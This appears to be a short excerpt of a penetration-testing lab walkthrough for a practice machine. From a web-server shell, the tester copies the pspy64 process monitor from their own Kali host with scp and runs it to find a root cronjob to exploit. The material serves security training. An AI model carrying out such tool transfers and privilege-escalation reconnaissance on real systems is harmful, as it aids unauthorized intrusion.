PSPY
A root cronjob process was identified
bash-4.2$ scp kali@192.168.45.192:/home/kali/PEN-200/PG_PRACTICE/megavolt/pspy64 /var/tmp/pspy64
Could not create directory '/usr/share/httpd/.ssh'.
The authenticity of host '192.168.45.192 (192.168.45.192)' can't be established.
ECDSA key fingerprint is SHA256:j/MDiRpw1W/l8twiQiqtSsP4xEOlNkCKHsjsVaVnnTM.
ECDSA key fingerprint is MD5:33:82:15:13:a3:22:e1:47:21:0a:e3:89:b6:32:a4:35.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/usr/share/httpd/.ssh/known_hosts).
kali@192.168.45.192's password:
pspy64 100% 3032KB 4.7MB/s 00:00 Delivery complete over SSH
bash-4.2$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY N/A